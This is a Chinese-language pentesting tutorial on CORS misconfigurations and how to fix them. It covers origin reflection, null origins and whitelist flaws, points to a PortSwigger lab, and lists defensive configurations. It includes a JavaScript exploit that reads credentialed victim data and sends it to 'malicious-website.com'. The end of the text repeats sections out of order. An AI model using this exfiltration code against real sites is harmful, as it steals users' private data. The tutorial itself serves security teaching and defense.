渗透测试中的CORS漏洞利用详解<\/h1>

1. CORS基础概念<\/h2>

1.1 什么是CORS(跨源资源共享)<\/h3>
跨源资源共享(CORS)是一种浏览器机制，允许对位于特定域外的资源进行受控访问。它扩展并增加了同源策略(SOP)的灵活性，但若配置不当，也可能为跨域攻击提供隐患。<\/p>

1.2 同源策略(SOP)<\/h3>

同源策略是一种限制性规范，用于限制网站与源域之外的资源进行交互的能力。它主要特点包括：<\/p>

限制跨域交互以防止恶意网站窃取数据<\/li>
允许向其他域发出请求但不允许访问响应<\/li>

基于协议、域名和端口判断是否同源<\/li> <\/ul>

2. CORS工作机制<\/h2>

2.1 CORS请求类型<\/h3>

简单请求<\/strong>：满足特定条件的GET\/HEAD\/POST请求<\/li>

预检请求<\/strong>：不满足简单请求条件的请求会先发送OPTIONS请求<\/li> <\/ol>
2.2 关键HTTP头<\/h3>

请求头<\/strong>：<\/p>

Origin<\/code>: 表明请求来源<\/li>
Access-Control-Request-Method<\/code>: 预检请求中声明实际请求方法<\/li>
Access-Control-Request-Headers<\/code>: 预检请求中声明实际请求头<\/li> <\/ul> <\/li>
响应头<\/strong>：<\/p> Access-Control-Allow-Origin<\/code> (ACAO): 允许访问的源<\/li> Access-Control-Allow-Credentials<\/code>: 是否允许携带凭证<\/li> Access-Control-Allow-Methods<\/code>: 允许的方法<\/li> Access-Control-Allow-Headers<\/code>: 允许的头部<\/li> <\/ul> <\/li> <\/ul> 3. CORS常见配置错误及漏洞利用<\/h2> 3.1 反射任意Origin的CORS漏洞<\/h3> 漏洞描述<\/strong>：服务器直接反射客户端提供的Origin头，未做任何过滤。<\/p> 示例<\/strong>：<\/p> GET \/sensitive-victim-data HTTP\/1.1 Host: vulnerable-website.com Origin: https:\/\/malicious-website.com Cookie: sessionid=... HTTP\/1.1 200 OK Access-Control-Allow-Origin: https:\/\/malicious-website.com Access-Control-Allow-Credentials: true <\/code><\/pre> 利用代码<\/strong>：<\/p> var<\/span> req<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span>req<\/span>.onload<\/span> =<\/span> reqListener<\/span>; <\/span><\/span>req<\/span>.open<\/span>('get'<\/span>,'https:\/\/vulnerable-website.com\/sensitive-victim-data'<\/span>,true<\/span>); <\/span><\/span>req<\/span>.withCredentials<\/span> =<\/span> true<\/span>; <\/span><\/span>req<\/span>.send<\/span>(); <\/span><\/span> <\/span><\/span>function<\/span> reqListener<\/span>() { <\/span><\/span> location<\/span>=<\/span>'\/\/malicious-website.com\/log?key='<\/span>+<\/span>this<\/span>.responseText<\/span>; <\/span><\/span>}; <\/span><\/span><\/code><\/pre>3.2 Origin解析错误<\/h3> 漏洞描述<\/strong>：虽然使用了白名单机制，但存在解析错误，如：<\/p> 子域通配符过于宽松(*.example.com<\/code>)<\/li> 未正确处理端口号<\/li> 正则表达式缺陷<\/li> 未验证协议(http\/https)<\/li> <\/ul> 3.3 信任null Origin<\/h3> 漏洞描述<\/strong>：服务器配置为信任null<\/code> Origin，攻击者可通过沙盒iframe触发。<\/p> 3.4 HTTPS域信任HTTP域<\/h3> 漏洞描述<\/strong>：服务器配置允许来自HTTP域的请求访问HTTPS资源，易受MITM攻击。<\/p> 4. CORS漏洞利用实战<\/h2> 4.1 基本步骤<\/h3> 识别CORS配置<\/p> 检查响应中的CORS头<\/li> 尝试修改Origin头观察响应<\/li> <\/ul> <\/li> 测试配置弱点<\/p> 反射任意Origin<\/li> 尝试绕过白名单<\/li> 测试null Origin<\/li> 检查凭证处理<\/li> <\/ul> <\/li> 构建利用代码<\/p> 使用XMLHttpRequest或Fetch API<\/li> 处理响应数据<\/li> <\/ul> <\/li> <\/ol> 4.2 靶场示例<\/h3> 靶场地址<\/strong>： https:\/\/portswigger.net\/web-security\/cors\/lab-basic-origin-reflection-attack<\/p> 解决方案<\/strong>：<\/p> 修改Origin头为攻击者控制的域<\/li> 确认服务器反射该Origin<\/li> 构造恶意页面窃取用户数据<\/li> <\/ol> 5. CORS安全防护<\/h2> 5.1 最佳实践<\/h3> 严格限制允许的Origin<\/strong><\/p> 避免使用通配符*<\/code><\/li> 维护精确的白名单<\/li> 动态验证Origin头<\/li> <\/ul> <\/li> 正确处理凭证<\/strong><\/p> 避免不必要的Access-Control-Allow-Credentials: true<\/code><\/li> 若必须使用凭证，严格限制Origin<\/li> <\/ul> <\/li> 限制允许的方法和头<\/strong><\/p> 仅开放必要的方法<\/li> 限制自定义头<\/li> <\/ul> <\/li> 使用Vary头<\/strong><\/p> Vary: Origin<\/code>防止缓存污染<\/li> <\/ul> <\/li> <\/ol> 5.2 配置示例<\/h3> 安全配置<\/strong>：<\/p> Access-Control-Allow-Origin: https:\/\/trusted.example.com Access-Control-Allow-Methods: GET, POST Access-Control-Max-Age: 86400 Vary: Origin <\/code><\/pre> 避免的配置<\/strong>：<\/p> Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true <\/code><\/pre> 6. 与其他漏洞的结合<\/h2> CORS漏洞常与以下漏洞结合利用：<\/p> CSRF：绕过同源策略执行跨站请求<\/li> XSS：通过注入脚本利用宽松的CORS策略<\/li> JSON劫持：窃取JSON数据<\/li> <\/ul> 7. 测试工具与方法<\/h2> 手动测试<\/strong>：<\/p> 使用Burp Suite修改Origin头<\/li> 观察响应头变化<\/li> <\/ul> <\/li> 自动化工具<\/strong>：<\/p> OWASP ZAP<\/li> Burp Scanner<\/li> Corsy等专用工具<\/li> <\/ul> <\/li> 浏览器开发者工具<\/strong>：<\/p> 检查网络请求中的CORS头<\/li> 查看控制台错误信息<\/li> <\/ul> <\/li> <\/ol> 8. 总结<\/h2> CORS是现代Web应用的重要机制，但错误配置可能导致严重安全问题。渗透测试人员应：<\/p> 全面测试CORS实现<\/li> 关注Origin处理逻辑<\/li> 检查凭证处理方式<\/li> 验证白名单实现<\/li> 评估与其他漏洞的结合可能性<\/li> <\/ol> 开发人员则应遵循最小权限原则，严格验证Origin，避免不必要的宽松配置。<\/p>

渗透测试中的CORS漏洞利用详解<\/h1>

1. CORS基础概念<\/h2>

1.1 什么是CORS(跨源资源共享)<\/h3> 跨源资源共享(CORS)是一种浏览器机制，允许对位于特定域外的资源进行受控访问。它扩展并增加了同源策略(SOP)的灵活性，但若配置不当，也可能为跨域攻击提供隐患。<\/p>

2. CORS工作机制<\/h2>

3. CORS常见配置错误及漏洞利用<\/h2>

3.3 信任null Origin<\/h3> 漏洞描述<\/strong>： 服务器配置为信任null<\/code> Origin，攻击者可通过沙盒iframe触发。<\/p>

5. CORS安全防护<\/h2>

1.1 什么是CORS(跨源资源共享)<\/h3>
跨源资源共享(CORS)是一种浏览器机制，允许对位于特定域外的资源进行受控访问。它扩展并增加了同源策略(SOP)的灵活性，但若配置不当，也可能为跨域攻击提供隐患。<\/p>

3.3 信任null Origin<\/h3>
漏洞描述<\/strong>：
服务器配置为信任`null<\/code> Origin，攻击者可通过沙盒iframe触发。<\/p>`